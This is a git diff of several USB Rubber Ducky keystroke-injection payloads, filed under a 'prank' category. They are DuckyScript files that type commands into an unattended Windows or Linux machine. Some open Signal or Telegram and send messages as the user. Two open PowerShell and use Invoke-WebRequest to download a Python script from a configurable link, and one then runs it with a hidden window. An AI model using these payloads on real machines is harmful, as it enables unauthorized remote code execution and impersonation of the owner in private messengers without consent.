EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 1000
GUI r
DELAY 500
STRING powershell
ENTER
STRINGLN powershell
DELAY 500
STRING Stop-Process -Name "Signal"
ENTER
STRING Start-Process $Env:USERPROFILE\AppData\Local\Programs\signal-desktop\Signal.exe; exit
ENTER
STRINGLN Stop-Process -Name "Signal"
DELAY 500
STRINGLN Start-Process $Env:USERPROFILE\AppData\Local\Programs\signal-desktop\Signal.exe; exit
DELAY 5000
TAB
TAB
TAB
ENTER
DELAY 100
STRING NUMBER
STRING #NUMBER
DELAY 100
TAB
DELAY 100
@ -44,8 +86,7 @@ DELAY 200
REM This is the message that will be sent.
REM You can change it as you want, if you want.
STRING YOUR_MESSAGE
ENTER
STRINGLN #MESSAGE
REM Closing Signal App
DELAY 500

75
payloads/library/prank/SendTelegramMessages_Linux/payload.txt
View File

@ -1,37 +1,64 @@
REM #########################################
REM # |
REM # Title : Send Telegram Messages |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Linux |
REM # |
REM #########################################
REM_BLOCK
#########################################
# #
# Title : Send Telegram Messages #
# Author : Aleff #
# Version : 1.1 #
# Category : Prank #
# Target : Linux #
# #
#########################################
REM Requirements:
REM - Internet Connection
REM - telegram-desktop installed and activated
Requirements:
- Internet Connection
- telegram-desktop installed and activated
END_REM
REM Define the message receiver username
DEFINE #USERNAME @example
REM Define the message(s)
DEFINE #MESSAGE1 example
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
DELAY 1000
CTRL-ALT t
DELAY 2000
STRING telegram-desktop
ENTER
STRINGLN telegram-desktop
REM It depends by the computer...
DELAY 3000
REM Define the message receiver username
DEFINE USERNAME @example
STRING USERNAME
ENTER
STRINGLN #USERNAME
DELAY 500
REM Define the message(s)
DEFINE MESSAGE1 example
STRING MESSAGE1
ENTER
STRINGLN #MESSAGE1
DELAY 500
REM other messages here...
REM ...

79
payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt
View File

@ -1,33 +1,70 @@
REM ############################################
REM # |
REM # Title : The Mouse Moves By Itself |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Windows 10/11 |
REM # |
REM ############################################
REM Requirements:
REM - Internet Connection
REM_BLOCK
############################################
# #
# Title : The Mouse Moves By Itself #
# Author : Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : Windows 10/11 #
# #
############################################
Requirements:
- Internet Connection
END_REM
REM REQUIRED - Set your Python script link
DEFINE SCRIPT-PY-LINK example.com
DEFINE #SCRIPT-PY-LINK example.com
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 1000
GUI r
DELAY 500
STRING powershell
ENTER
STRINGLN powershell
DELAY 500
STRING Invoke-WebRequest -Uri "
STRING SCRIPT-PY-LINK
STRING " -OutFile "script.py"
ENTER
STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
DELAY 500
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden

25
payloads/library/prank/This_damn_shell_doesn_t_work___so_sad!/payload.txt
View File

@ -1,15 +1,18 @@
REM ############################################################
REM # #
REM # Title : This damn shell doesn't work, SO SAD! :C #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : Prank #
REM # Target : Linux #
REM # #
REM ############################################################
REM_BLOCK
############################################################
# #
# Title : This damn shell doesn't work, SO SAD! :C #
# Author : Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : Linux #
# #
############################################################
Requirements:
- Nothing <3
END_REM
REM Requirements:
REM - Nothing <3
REM With Kali Linux 2020.4, the new default shell is now ZSH for users who install the distribution.
DEFINE #TARGET_KALI_LINUX TRUE

31
payloads/library/prank/Try_To_Catch_Me/payload.txt
View File

@ -1,27 +1,26 @@
REM ####################################
REM # |
REM # Title : Try To Catch Me |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Windows 10/11 |
REM # |
REM ####################################
REM_BLOCK
####################################
# #
# Title : Try To Catch Me #
# Author : Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : Windows 10/11 #
# #
####################################
REM Requirements:
REM - Python
REM - Internet Connection
Requirements:
- Python
- Internet Connection
END_REM
REM REQUIRED - Set your Python script link
DEFINE #SCRIPT-PY-LINK example.com
DELAY 1000
GUI r
DELAY 500
STRING powershell
ENTER
STRINGLN powershell
DELAY 500
STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"